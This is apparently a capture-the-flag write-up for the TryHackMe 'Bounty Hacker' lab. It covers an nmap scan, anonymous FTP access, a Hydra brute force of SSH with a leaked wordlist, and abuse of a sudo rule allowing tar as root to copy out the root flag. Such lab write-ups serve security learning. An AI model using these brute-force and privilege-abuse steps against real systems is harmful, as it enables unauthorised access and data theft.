Try Hack Me - Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Despite the fun theme and implication that there is something elite about this beginner CTF, this one is too quick and easy to actually be much fun.

Scan with NMAP

Look for open ports, use a simple NMAP scan. Useful ports are found for the ftp and ssh services, the http service is just a theme page with nothing of value for capturing flags.

kali@kali:~/ctf/thm/cowboyhacker$ sudo nmap -Pn -sV
Starting Nmap 7.80 ( ) at 2020-10-02 21:51 UTC
Nmap scan report for
Host is up (0.32s latency).
Not shown: 967 filtered ports, 30 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 139.34 seconds

Try anonymous FTP

When in doubt, try anonymous FTP first. It's available and gets us a couple files with information in them about a possible user name, and a list of leet-speak that could be a password list.

kali@kali:~/ctf/thm/cowboyhacker$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 07 21:47 .
drwxr-xr-x    2 ftp      ftp          4096 Jun 07 21:47 ..
-rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
226 Directory send OK.

Brute force password with likely user name

Hydra can brute force the SSH service, the suspected username looks good and we find a winner.

kali@kali:~/ctf/thm/cowboyhacker$ hydra -l lin -P locks.txt "ssh://"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2020-10-02 22:04:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: lin   password: ******************
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra ( finished at 2020-10-02 22:04:52

Connect with SSH

Now that we have access, we can get information in the directories that user has access to (which gets us a flag), and begin to look for exploits.

kali@kali:~/ctf/thm/cowboyhacker$ ssh lin@
lin@'s password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:
 * Management:
 * Support:

83 packages can be updated.
0 updates are security updates.

Last login: Sun Jun  7 22:23:41 2020 from
lin@bountyhacker:~/Desktop$ ls -la
total 12
drwxr-xr-x  2 lin lin 4096 Jun  7 17:06 .
drwxr-xr-x 19 lin lin 4096 Jun  7 22:17 ..
-rw-rw-r--  1 lin lin   21 Jun  7 17:06 user.txt
lin@bountyhacker:~/Desktop$ cat user.txt

Look for improper permissions

Given how straightforward this room has been so far I decided to just try sudo -l and not bother uploading linpeas. Intuition saved some time and it turns out this user can run tar as root.

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
lin@bountyhacker:~/Desktop$ sudo tar -cf ./root.tar /root/root.txt
tar: Removing leading `/' from member names

Use improper permissions to exfiltrate

With this improperly configured permissions that means we can take a wild guess at where the root flag is, and use tar to make an archive as root. Then we'll just download that tar file and have the second, and last, flag.

lin@bountyhacker:~/Desktop$ tar tvf root.tar 
-rw-r--r-- root/root        19 2020-06-07 17:16 root/root.txt
lin@bountyhacker:~/Desktop$ logout
Connection to closed.
kali@kali:~/ctf/thm/cowboyhacker$ scp lin@ .
lin@'s password: 
root.tar                                                                                                                   100%   10KB   2.7KB/s   00:03    
kali@kali:~/ctf/thm/cowboyhacker$ tar xvf root.tar
kali@kali:~/ctf/thm/cowboyhacker$ more root/root.txt